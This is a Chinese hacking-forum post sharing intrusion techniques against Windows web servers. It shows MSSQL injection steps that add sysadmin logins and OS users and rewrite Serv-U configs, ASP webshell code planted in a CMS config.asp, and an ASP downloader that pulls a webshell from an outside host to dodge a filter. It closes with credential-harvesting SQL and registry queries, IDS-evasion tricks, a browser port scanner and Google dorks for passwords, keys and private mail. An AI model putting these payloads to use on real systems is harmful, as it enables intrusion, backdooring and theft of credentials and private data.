[原创]几个用过的入侵技巧整理
作者:伤心的鱼[BCT]前言:
本来这篇文章是年前跟非安全的约稿. 但是不知道什么原因没有发.正好今天整理的时候就找到了.就发到这吧
知道邪八的高手如云... 希望别拍我 垃圾文章 赚个原创 高手别拍我..
正文:
从本文你可以学到:
1.MSSQL中一些扩展的应用
2.网站配置文件插入一句话
3.如何突破一流信息监控系统
这期这篇文章呢其实是比较杂乱的,所以我也不知道题目要用什么好,不过相信我,这篇文章看完之后你一定会学到很多新的在渗透过程中思路,OK,跟我来吧!
一、SQL server的灵活应用
我们知道在渗透过程中思路是最重要的,有时候往往一个细节就决定成败。呵呵,不过理论终究是理论,看过我以前文章的朋友一定知道,我更喜欢以一个事例来讲解一个东西。因为我只是讲一个思路的问题,所以就不会写很多,只写经典的部分,如果大家需要的话以后我会单独写一篇渗透的文章,来详细介绍每一个方法的使用。OK,我们开始吧!
话说前几天朋友丢给我一个SA的注射点.但是死活就是不能执行命令。说问我能不能帮忙看看。既然朋友说话了并且据说是非常BT的SA,自己也愿意挑战下。拿到地址后首先telnet一下它的1433。呵呵,这个可能很多朋友就不会注意为什么要先telnet呢? 因为是SA嘛,只要能telnet上去我们就可以在注射点那里执行命令。加一个具有SA权限的sql用户上去,这样在查询分析器里执行命令要比在注射点那里方便的多呢。使用●telnet 61.129.251. x 1433 ●发现可以telnet上去. OK 马上在注射点后面执行:
★
exec master.dbo.sp_addlogin fishing hook;
exec master.dbo.sp_addsrvrolemember fishing,sysadmin
★
这个命令就是添加一个用户名为fishing密码为hook的SQL用户,权限为SA。两次执行页面都返回成功,说明用户添加成功了。使用SQL server的查询分析器连上,然后执行exec master.dbo.xp_cmdshell 'net user' 发现提示错误:
★
错误消息
50001,级别 1,状态 50001
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)
★
很多朋友问过我这个错误信息是什么意思,这里解释一下,其实很简单,那个错误是明明写着 CreateProcess 进程无法创建,而xp_cmdshell 是执行什么进程大家应该知道吧,CMD这个进程无法创建!有可能CMD设置权限拒绝SYSTEM访问,有可能是CMD删除或者改名。以上情况都可以造成CMD进程无法创建的,如图1。
图1
[img]http://www.ixpub.net/attachments/day_080305/20080305_4237737f0aa059446178u6GNM9SrudST.jpg[/img][img]http://www.ixpub.net/images/ixpub_01/attachimg.gif[/img]
看来直接想加用户登陆服务器是不可能了,可能有的朋友会说:不是还有SP_OAcreate 么?但是我在使用SP_OAcreate执行:
★
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user fish sadfish /add'
★
的时候虽然提示执行成功,但是却发现用户并没有添加进去,初步估计应该是wscript.shell被删掉了。
另外如果xp_regwrite 这个存储在的话我们还可以用沙盒模式搞定他的。不过虽然以上三个重要的存储过程都不能用,但是我们还可以用xp_subdirs来列目录。在列到D盘的时候发现了服务器装有serv-u,聪明的朋友们是不是想到了什么?我们可以通过使用FSO在suer-v的●ServUDaemon.ini●里写配置信息 添加一个具有system权限的ftp用户,说做就做,首先使用
★
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
★
这段代码的意思是通过使用存储过程来读取d:\Serv-U6.3\ServUDaemon.ini里的配置信息,返回执行成功 如图2
[img]http://www.ixpub.net/attachments/day_080305/20080305_edd28250f74e25832ad4wryZcVucXCaU.jpg[/img][img]http://www.ixpub.net/images/ixpub_01/attachimg.gif[/img]
既然可以读了 那么我们是不是可以写一个进去?继续执行
★
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 《这里添写自己写好的SU配置信息,刚才复制的那些都要写上去,在最后添加我们自己的,跟我们在WEBSHELL里的serv-u提权是一样的》
★
按F5,执行一下,发现命令执行成功,马上使用上面的语句复查一下,发现已经写进去了,如图3。
图3
[img]http://www.ixpub.net/attachments/day_080305/20080305_400dc0cc2103da865ae9hPJmSAMfc6FR.jpg[/img][img]http://www.ixpub.net/images/ixpub_01/attachimg.gif[/img]
OK 剩下的事情就不用我多说了吧?FTP上去,直接添加用户登陆服务器就OK了,这里就不多废话了。怎么样?发现了吧?在渗透过程中只要细心+灵活的运用知识就可以完美的达到效果啦。
二、网站配置文件插马
MY动力管理系统相信很多朋友都玩过吧?但是他的后台可是有点BT。虽然有数据库备份但是并不支持自定义路径,而且数据库里还有
<% loop <% 不能闭和,所以数据库备份几乎是没什么用了。不过以前有朋友提出可以先恢复再备份的方法,不过我没测试成功。
这里教大家的方法就是配置文件插马,至于怎么进到后台我就不说,是注射也好,下载默认数据库也好总之能进后台就OK了。进到后台后我们会发现在常规设置,那里有个网站信息配置,点开他,如图4。
图4
[img]http://www.ixpub.net/attachments/day_080305/20080305_48f4a5d68a63b0bb71cd69ihSvwQ6VCS.jpg[/img][img]http://www.ixpub.net/images/ixpub_01/attachimg.gif[/img]
我们看到版权信息那里写着 "版权所有 Copyright? 2003 <a href='http://www.asp163.net'>动力空间</a>" ,这是系统自带的,因为这里没有限制我们输入的字符长度 所以我们就可以在这里传一个类似小马的东西。注意是类似,而不是小马(编辑点评:其实就是个小马。),直接在版权信息那里进行替换,前面要加上他原有的语句,替换代码如下:
★
版权所有 Copyright? 2003 <a href='http://www.asp163.net'>动力空间</a>" '版权信息
if Request("xiaoxin")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "小新恭喜"
end if
Response.write "<form method='POST'action='"&Request.ServerVariables("URL")&"?xiaoxin=520&creat=yes'>"
Response.write "<textarea name='text'>"&thisline&"</textarea><br>"
Response.write "<input type='text' name='path' value='"&Request("path")&"'>"
Response.write "<input name='submit' type='submit' value='ok' ></form>"
Response.end
end if
%>
★
然后保存一下,千万注意,这个时候,千万别跳转任何页面。直接在ie地址栏内将admin/Admin_Login.asp替换成 inc/config.asp?xiaoxin=520,有人会问为什么了?因为在上边版权信息内的代码,是一段发送程序,利用inc/config.asp相关文件信息所写。
进入这个页面之后会发现:这是啥玩意? 好象一个小马。那你就当小马用好了,上面写你的ASP木马代码,下面写上路径,如图5、6。
图5
图6
[img]http://www.ixpub.net/attachments/day_080305/20080305_25f54f8872ca33fbc046JW5GYC83Jgqi.jpg[/img][img]http://www.ixpub.net/images/ixpub_01/attachimg.gif[/img]
[img]http://www.ixpub.net/attachments/day_080305/20080305_68189ceb241d968f002aGScmIl4OMMiZ.jpg[/img][img]http://www.ixpub.net/images/ixpub_01/attachimg.gif[/img]
怎么样?SHELL拿到了吧,这里有一点要注意,虽然SHELL是拿到了但是这个时候网站也挂掉了,我们需要进到SHELL里找到config.asp文件,把里面的 "小新恭喜" 去掉,就OK啦。
其实不光是MY动力管理系统,动易文章系统以前也存在这个问题:在站长信箱那里写入"%><%eval(request("xiaozhi"))%><%' 然后直接连接
inc目录下的config.asp就可以了。因为很多网站信息都是写入在config.asp里的,有空各位朋友可以自己去测试一下(编辑:如果读者朋友懂ASP可以自己研究一些ASP程序是否在后台配置文件用到FSO,这样基本上就是把配置信息写到了ASP文件里了)。
三、突破一流信息监控系统实现文件“上传”
相信很多朋友可能遇到过这样一个问题:在得到一个小马以后传大马的时候服务器却提示错误:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:98424b88afb8,如图7。
图7
[img]http://www.ixpub.net/attachments/day_080305/20080305_4379acac8ac8ab41cf9d36sXYXhsb7f2.jpg[/img][img]http://www.ixpub.net/images/ixpub_01/attachimg.gif[/img]
本来以为换个大马就可以了,但是我换了N个马都是不行。我想可能是禁止提交了,但是随便提交几个字都是OK的,原来是因为它设置了限制提交字符,只要我们的大马里包含特殊字符就会被拒绝提交,不过我们还是有办法突破他的。
这个就好比我们上传EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中。比如VBS?嘿嘿 好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件,代码如下:
★
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",[url=http://www.hack521.cn/fish.txt][color=#535353]http://www.hack521.cn/fish.txt[/color][/url],False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("fish.asp"),2
set sGet = nothing
set sPOST = nothing
%>
★
利用服务器的XML和数据流组件,从我的blog的fish.txt的内容下载到目标站点根目录并保存为fish.asp。fish.txt中的内容当然就是被拦截的内容了,也就是我们的大马。之后访问这个提交的ASP文件,会出现一片空白,然后我们再访问这个fish.asp文件,则想要上传的内容已经被保存成功!如图8。
图8
[img]http://www.ixpub.net/attachments/day_080305/20080305_ee4d147bc2f315e5641cKSYLAUhXxfcy.jpg[/img][img]http://www.ixpub.net/images/ixpub_01/attachimg.gif[/img]
怎么样?亲爱的读者?你学会了没有?是不是脑子里又多了一条新思路?这期我主要以三个实例来讲解一下一些大家都知道但是都不常用的方法。很多朋友问过我,为什么我写的文章里所用的方法家都知道,为什么就想不到呢?还是那句话,思路要清晰,渗透是一个细致活,不急不躁方能心平。我的ID是CNSST或者加我QQ也可以:459014 ,下期见!
编辑点评:MSSQL是个强大的数据库,能灵活运用其提供给我们的扩展,就不是一般的高手了;关于配置文件写马,为了写马后还能让网站运行正常,写进Config.asp里的就要是容错的一句话了,比如:<%if request("cmd")<>"" then execute request("cmd")%>或者<%on error resume next:execute request("cmd")%>等等;如果你能熟练掌握MS的一些组件运用,你也是个高手了。 垃圾文章。 .全为出来混个脸熟 好久没来了. 看个热闹就行.... 谢谢各位高手...
一些SQL语句-希望对大家有帮助(原创-代码没整理部分无效)
--获得对方主机上sql的安装位置:exec xp_instance_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\MSSQLServer\Setup', 'SQLPath'
---------------------------------------------------------------------
--列举用户密码和帐户
---------------------------------------------------------------------
use master
select
[name] as 数据库用户,
password as 用户密码,
language as 当前语言
from sysxlogins where name is not null
--列举数据库用户
use model select name as 数据库操作员列表 from sysusers
---------------------------------------------------------------------
--先授权 Windows NT域用户权限
--然后创建新的 Microsoft? SQL Server? 登录
---------------------------------------------------------------------
EXEC sp_grantlogin 'jcb-27\Administrator'
EXEC sp_addlogin 'administrator' --Inside of Net user's
--查询帐户、帐户类型、帐户的特权级别、帐户的映射登录名和帐户访问 Microsoft? SQL Server? 的权限路径
EXEC xp_logininfo 'BUILTIN\Administrators'
--列举出已登录过的空密码帐户
---------------------------------------------------------------------
Select name,Password from syslogins where password is null
----------------------------------------------------------------------
----------------------------------------------------------------------
--ALTER LOGIN [sa] WITH NAME=[zxs] /*修改SA帐号*/
/*修改SA密码*/
exec sp_password null,'sa','sa'
--exec master..sp_password @old='sa'/*原始密码*/,@new=null/*修改的密码*/,@loginame='sa'/*登录用户名*/
exec master..xp_msver ProductName,language,WindowsVersion,FileDescription
exec master..xp_Msgetversion
----------------------------------------------------------------------
--系统错误信息
select * from sysmessages where msglangid='2052'--错误信息ID
--select name,filename from sysdatabases where name is not null
select name,crdate as 创建日期,filename as 文件路径 from sysdatabases where name is not null
----------------------------------------------------------------------
--查询SQL服务器信息(保留)
select @@version as SQL版本信息以及操作系统版本
----------------------------------------------------------------------
declare @Os_langugage varchar(500)
set @Os_langugage=(select @@version as SQL版本信息以及操作系统版本)
exec master..xp_cmdshell 'echo @Os_langugage|find /i "sql"'
-----------------------------------------------------------------------
--判断目标操作系统
-----------------------------------------------------------------------
select name as 操作系统语言 from syslanguages where langid=(select @@LANGID)
select @@language as SQL服务器所用语言
if ((select name /*as 操作系统语言*/ from syslanguages where langid=(select @@LANGID))=(select @@language /*as SQL服务器所用语言*/))
print '@@language查询结果和数据库master表中通过langid定位的语言一致'
----------------------------------------------------------------------------------------------------------------------------------
select user as 数据库当前操作员用户名
SELECT @@NESTLEVEL
--select loginname,hostname,dbname
USE master EXEC sp_who
USE master EXEC sp_who 'active'
select @@SERVERNAME as 服务器名称
select @@SERVICENAME as 数据系统服务名
--as 操作系统版本确认
exec Sp_addextendedproc '_GetXpVersion','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
exec master.._GetXpversion
exec master..xp_qv
exec xp_msver
use master
exec Sp_addextendedproc 'xp_regread','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
exec xp_regread HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion', 'ProductName'
exec xp_regread HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon','DefaultPassword'
exec xp_regread HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon','DefaultUserName'
Exec master..xp_cmdshell 'ver|find /i "xp"||(ver|find /i "2000")||(ver|find /i "98")||(ver|find /i "2003")||(ver|find /i "nt")'
--列举远程计算机本地域的用户
Exec master..xp_cmdshell 'net user'
Exec master..xp_cmdshell 'net accounts'
Exec master..xp_cmdshell 'ver|find /i"xp"&&systeminfo'
exec master..xp_cmdshell '(echo %systemroot%|find /i "winnt">nul)&&if errorlevel 0 (echo 系统文件夹是winnt,可能是Windows 2K操作系统) else (echo 系统文件夹windows)'
--SELECT count(*) FROM master.dbo.sysobjects
--exec msater..xp_regenumvalues HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion' 'ProductName'
--exec master..xp_servicecontrol 'start','schedule'
exec master..Xp_availablemedia --显示机器上有用的驱动器
exec master..xp_cmdshell 'cmd.exe /c for %i in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: x: y: z: ) do @if exist %i echo %i'
--exec master..Xp_dirtree --允许获得一个目录树
exec master..Xp_enumdsn --列举服务器上的ODBC数据源
exec master..Xp_loginconfig --Reveals information about the security mode of the server
--exec master..Xp_makecab --允许用户在服务器上创建一个压缩文件
exec master..Xp_ntsec_enumdomains --列举服务器可以进入的域
exec master..Xp_terminate_process 484--提供进程的进程ID,终止此进程
--绕过IDS的检测[使用变量]
--declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
--declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\
--其中连接字符串参数可以是任何端口用来连接,比如
--select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=sa;Network=DBMSSOCN;Address=127.0.0.1,1433;, select * from table
--复制目标主机的整个_blank>数据库insert所有远程表到本地表。
use master
Select name,Password from syslogins where password is null
贴一个Javascript扫描端口的html(经过注释)
<html><x>国外网站淘金淘回来的,呵呵</x>
<style type="text/css">
input {
star : expression(
onmouseover=function(){this.style.backgroundColor="#FF0000"},
onmouseout=function(){this.style.backgroundColor="#FFFFFF"}
)
}
</style>
<form>
<label for="target">目标主机</label>
(如果是网址,无需指定传输协议,默认支持http://)<br/>
<input type="text" name="target" value="www.gnucitizen.org" alt="请输入目标主机"/><br/>
<label for="port">端口</label><br/>
<input type="text" name="port" value="80" alt=请输入扫描的端口/><br/>
<p>你可以按次序的的输入 80,81,8080</p>
<label for="timeout">超时(默认100毫秒)</label><br/>
<input type="text" name="timeout" value="1000"/><br/>
<label for="result">结果</label><br/>
<textarea id="result" name="result" rows="7" cols="50" onClick="javascript:document.this=''"></textarea><br/>
<input class="button" type="button" value="scan" onClick="javascript:scan(this.form)"/>
</form>
<script>
var AttackAPI = {
version: '0.1',
author: 'Petko Petkov (architect)',
homepage: 'http://www.gnucitizen.org'};
AttackAPI.PortScanner = {};
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) { //*带参数的函数*/
var timeout = (timeout == null)?100:timeout; //设置默认的超时为100毫秒
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, '开放');
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, port, '关闭');
}, timeout);
};
AttackAPI.PortScanner.scanTarget = function (callback, target, ports, timeout)
{
for (index = 0; index < ports.length; index++)
AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout);
};
</script>
<script>
var result = document.getElementById('result');
var callback = function (target, port, status) {
result.value += target + ':' + port + ' ' + status + "\n";
};
var scan = function (form) {
AttackAPI.PortScanner.scanTarget(callback, form.target.value, form.port.value.split(','), form.timeout.value);
};
</script>
</html>
javascript访问MS SQL的html文件(经过加工的)
<html><head>
<title>表格显示数据表记录</title>
</head>
<body>
<h2>表格显示数据表记录</h2>
<hr>
<script language="JavaScript">
var objdbConn = new ActiveXObject("ADODB.Connection");
var strdsn = "Driver={SQL Server};SERVER=localhost;UID=sa;PWD=sa;DATABASE=master";
objdbConn.Open(strdsn);
var objrs = objdbConn.Execute("Select name,Password from syslogins where password is null");
var fdCount = objrs.Fields.Count - 1;
if (!objrs.EOF){
document.write("<table border=1><tr>");
for (var i=0; i <= fdCount; i++)
document.write("<td><b>" + objrs.Fields(i).Name + "</b></td>");
document.write("</tr>");
while (!objrs.EOF){
document.write("<tr>");
for (i=0; i <= fdCount; i++)
document.write("<td valign='top'>" + objrs.Fields(i).Value + "</td>");
document.write("</tr>");
objrs.moveNext(); // 移到下一个记录点
}
document.write("</table>");
}
else
document.write("数据库内没有记录!<br>");
objrs.Close(); // 关闭记录集和
objdbConn.Close(); // 关闭数据库链接
</script>
</body>
</html>
高手看看这篇文章里面的javascript连接SQL的html文件
Combining North Pole with South Pole: JavaScript with SQL Server 2000(Page 1 of 6 )
Every DBA/database developer would certainly(的确) be shocked to think about
a relationship between client-side JavaScript and SQL Server 2000.
It's real.
Not every programmer knows that we can connect and break into SQL Server 2000
simply by using client-side JavaScript.
This article covers the positive aspects of connecting to a SQL Server 2000 database
本文容纳了切实有效的实例
lying on the client computer (or the browser computer).
依赖客户端电脑(或电脑的浏览器)
If you are new to working with the types of examples in this article,
I suggest you go through my series "Advanced JavaScript with Internet Explorer"
on this web site.
You can directly copy and paste all of the code samples present in this article
into a file with the extension ".htm" and open in Internet Explorer 5.5+.
To successfully connect to the database, the database must be installed
with WMI extensions of SQL Server 2000.
First of all, you need to install "WMI SQL Server Administration Provider" on
an existing instance of SQL Server 2000 (if it is not already installed).
This is not part of the default or custom installation.
You need to install it separately from SQL server installations.
You can find the "WMI SQL Server Administration Provider" installation files
at the "x86otherwmi" path of your SQL Server 2000 installation CD.
To be frank(坦诚地说), I really didn't check this on SQL Server 7.0.
So, my focus will always be on SQL Server 2000 in this article.
How to get a list of all database names existing in a SQL Server 2000 instance(实例or对象) using JavaScript
Now, let us try to develop a simple script (JavaScript)
which shows the technique(技巧) for retrieving(找回OR重新获取)
all database names available in an SQL Server 2000 instance.
The entire code for the sample is as follows:
完整的代码如下所示:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title></title>
<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
<script id="clientEventHandlersJS" language="javascript">
<!--
function Button1_onclick() {
var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
var service = locator.ConnectServer(".","rootMicrosoftSQLServer");
var properties = service.ExecQuery("SELECT Name FROM MSSQL_Database");
var e = new Enumerator (properties);
document.write("<table border=1>");
dispHeading();
for (;!e.atEnd();e.moveNext ())
{
var p = e.item ();
document.write("<tr>");
document.write("<td>" + p.Name + "</td>");
document.write("<td>" + p.SQLServerName + "</td>");
document.write("</tr>");
}
document.write("</table>");
}
function dispHeading()
{
document.write("<thead>");
document.write("<td>Name</td>");
document.write("<td>SQLServerName</td>");
document.write("</thead>");
}
//-->
</script>
</head>
<body>
<INPUT id="Button1" type="button" value="Button" name="Button1" language="javascript" onclick="return Button1_onclick()">
</body>
</html>
In the above code the "meta" tags are not necessary.
They have been automatically added by Visual Studio.
The above code will automatically list all database
names available in the SQL Server 2000 instance belonging to the client.
It mainly lists the names of databases along with the SQL Server Name
(in this case we are connecting only to the default instance).
To retrieve this information, I used a built-in class,
"MSSQL_Database," available in the "rootMicrosoftSQLServer" namespace.
The "for" loop I used in the above code iterates(反复) for
every database present in the SQL Server instance and finally retrieves only the properties of that database.
Combining North Pole with South Pole: JavaScript with SQL Server 2000 - How to get a list of all table names available in a SQL Server 2000 database using JavaScript
(Page 2 of 6 )
As the previous section has shown only the database names,
we shall now try to develop a simple script (JavaScript) which shows the technique(技巧) for retrieving
all table names available in a SQL Server 2000 database.
The entire code for the sample is as follows:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title></title>
<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
<script id="clientEventHandlersJS" language="javascript">
<!--
function Button1_onclick() {
var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
var service = locator.ConnectServer(".","rootMicrosoftSQLServer");
var properties = service.ExecQuery("SELECT Name FROM MSSQL_Table WHERE DatabaseName = 'Northwind'");
var e = new Enumerator (properties);
document.write("<table border=1>");
dispHeading();
for (;!e.atEnd();e.moveNext ())
{
var p = e.item ();
document.write("<tr>");
document.write("<td>" + p.Name + "</td>");
document.write("</tr>");
}
document.write("</table>");
}
function dispHeading()
{
document.write("<thead>");
document.write("<td>Name</td>");
document.write("</thead>");
}
//-->
</script>
</head>
<body>
<INPUT id="Button1" type="button" value="Button" name="Button1" language="javascript" onclick="return Button1_onclick()">
</body>
</html>
The above code will automatically list all table names available in the database
"Northwind" of a SQL Server 2000 instance belonging to the client.
To retrieve this information, I used a built-in class, "MSSQL_Table,"
available in the "rootMicrosoftSQLServer" namespace.
The "for" loop I used in the above code iterates for every table present in the SQL Server database and finally retrieves only the properties of that table.
Combining North Pole with South Pole: JavaScript with SQL Server 2000 - How to get a list of all columns along with their table names available in a SQL Server 2000 database using JavaScript
(Page 3 of 6 )
As the previous section has shown only the table names,
we shall now try to develop a simple script (JavaScript) which shows the technique for retrieving all column names available in a SQL Server 2000 database.
The entire code for the sample is as follows:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title></title>
<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/
intellisense/ie5">
<script id="clientEventHandlersJS" language="javascript">
<!--
functionButton1_onclick() {
var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
var service = locator.ConnectServer(".","rootMicrosoftSQLServer");
var properties = service.ExecQuery("SELECT Name,TableName FROM
MSSQL_Column WHERE DatabaseName = 'Northwind'");
var e = new Enumerator (properties);
document.write("<table border=1>");
dispHeading();
for (;!e.atEnd();e.moveNext ())
{
var p = e.item ();
document.write("<tr>");
document.write("<td>" + p.Name + "</td>");
document.write("<td>" + p.TableName + "</td>");
document.write("</tr>");
}
document.write("</table>");
}
functiondispHeading()
{
document.write("<thead>");
document.write("<td>Name</td>");
document.write("<td>TableName</td>");
document.write("</thead>");
}
//-->
</script>
</head>
<body>
<INPUT id="Button1" type="button" value="Button" name="Button1"
language="javascript" onclick="return Button1_onclick()">
</body>
</html>
The above would automatically list all columns names (along with their table names) available in the database "Northwind" of a SQL Server 2000 instance belonging to the client. To retrieve this information, I used a built-in class, "MSSQL_Column," available in the "rootMicrosoftSQLServer" namespace. The "for" loop I used in the above code iterates for every column present in the SQL Server database and finally retrieves only the properties of that column.
Combining North Pole with South Pole: JavaScript with SQL Server 2000 - How to get a list of all views available in a SQL Server 2000 database using JavaScript
(Page 4 of 6 )
Now, let us develop a simple script (JavaScript) which shows the technique for retrieving all views available in a SQL Server 2000 instance. The entire code for the sample is as follows:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title></title>
<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/
intellisense/ie5">
<script id="clientEventHandlersJS" language="javascript">
<!--
functionButton1_onclick() {
var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
var service = locator.ConnectServer(".","rootMicrosoftSQLServer");
var properties = service.ExecQuery("SELECT * FROM MSSQL_View");
var e = new Enumerator (properties);
document.write("<table border=1>");
dispHeading();
for (;!e.atEnd();e.moveNext ())
{
var p = e.item ();
document.write("<tr>");
document.write("<td>" + p.Name + "</td>");
document.write("</tr>");
}
document.write("</table>");
}
functiondispHeading()
{
document.write("<thead>");
document.write("<td>Name</td>");
document.write("</thead>");
}
//-->
</script>
</head>
<body>
<INPUT id="Button1" type="button" value="Button" name="Button1"
language="javascript" onclick="return Button1_onclick()">
</body>
</html>
The above code will automatically list all view names available in the SQL Server 2000 instance belonging to the client. To retrieve this information, I used a built-in class,
"MSSQL_view," available in the "rootMicrosoftSQLServer" namespace. The "for" loop I used in the above code iterates for every view present in the SQL Server instance and finally retrieves only the properties of that view
[url]http://www.devarticles.com/c/a/JavaScript/Combining-North-Pole-with-South-Pole-JavaScript-with-SQL-Server-2000/4/[/url]
Combining North Pole with South Pole: JavaScript with SQL Server 2000 - How to get the source code (or SELECT statement) of a single view available in a SQL Server 2000 database using JavaScript
(Page 5 of 6 )
In the previous section, I gave you only the view names. I know that this is not very useful. Let us further extend the code and develop a simple script (JavaScript) which shows the technique for retrieving the SELECT statement of a view available in a SQL Server 2000 database. The entire code for the sample is as follows:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title></title>
<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/
intellisense/ie5">
<script id="clientEventHandlersJS" language="javascript">
<!--
functionButton1_onclick() {
var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
var service = locator.ConnectServer(".","rootMicrosoftSQLServer");
var properties = service.ExecQuery("SELECT * FROM MSSQL_View where name='[dbo].[Invoices]'");
var e = new Enumerator (properties);
var p = e.item ();
document.write(p.Text);
}
//-->
</script>
</head>
<body>
<INPUT id="Button1" type="button" value="Button" name="Button1"
language="javascript" onclick="return Button1_onclick()">
</body>
</html>
Now, let us develop a simple script (JavaScript) which shows the technique for retrieving all stored procedures available in a SQL Server 2000 database. The entire code for the sample is as follows:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title></title>
<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/
intellisense/ie5">
<script id="clientEventHandlersJS" language="javascript">
<!--
functionButton1_onclick() {
var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
var service = locator.ConnectServer(".","rootMicrosoftSQLServer");
var properties = service.ExecQuery("SELECT * FROM MSSQL_StoredProcedure
WHERE databasename='Northwind'");
var e = new Enumerator (properties);
document.write("<table border=1>");
dispHeading();
for (;!e.atEnd();e.moveNext ())
{
var p = e.item ();
document.write("<tr>");
document.write("<td>" + p.Name + "</td>");
document.write("<td>" + p.Text + "</td>");
document.write("</tr>");
}
document.write("</table>");
}
functiondispHeading()
{
document.write("<thead>");
document.write("<td>Name</td>");
document.write("<td>Text</td>");
document.write("</thead>");
}
//-->
</script>
</head>
<body>
<INPUT id="Button1" type="button" value="Button" name="Button1"
language="javascript" onclick="return Button1_onclick()">
</body>
</html>
The above code will automatically list all stored procedure names (along with the source code) available in the database "Northwind" of a SQL Server 2000 instance belonging to the client. To retrieve this information, I used a built-in class, "MSSQL_StoredProcedure," available in the "rootMicrosoftSQLServer" namespace. The "for" loop I used in the above code iterates for every stored procedure present in the SQL Server database and finally retrieves only the properties of that stored procedure.
Any comments, suggestions, bugs, errors, feedback etc. are highly appreciated at [email]jag_chat@yahoo.com[/email].
=====================================================================
下载控件了,在ZK和XP测试均没通过 ????
Google Hacking Against Privacy学习笔记(原创)
Google Hacking Against Privacytitle:Google Hacking 挑战隐私
ps:此文档内容为德国一家国立大学的***写出来的
英语烂翻译不是很好,欢迎查错,但我有把握绝对没有扭曲作者文章中的原意
部分搜索语句中还有"(注释内容)" 查询时候请手动删除
-----------------------
[all]inurl
[all]intext
[all]intitle
site
ext,filetype
symbol: - . * |
boolean Epression: and or not
lang:"c++" define
隐私信息
1.用户名和密码
"create table" insert into" "pass|passwd|password" (ext:sql | ext:dump | ext:txt)
"your password * is" (ext:csv | ext.doc | ext:txt)
2. 密匙
"index of" slave_datatrans OR from_master
3.隐私的密码
"Begin (DSA | RSA)" ext:key
"index of" "secring.gpg"
4.经过加密的消息
-"public | pubring | pubkeysignature | pgp | and | or |release" ext:gpg
-intext:"and" (ext:enc | ext:axx)
"ciphervalue" ext:xml
机密信息
那些期望成为机密以杜绝未经授权人查看的信息
data that is expected to stay confidential against unauthorized access
1.聊天日志
"session start" "session ident" thomas ext:txt
2.私人信件/邮件
"index of" inbox.dbx
"To parent directory" inurl:"Identities"
3.机密的目录和文件
"index of" (private | secure | geheim | gizli)
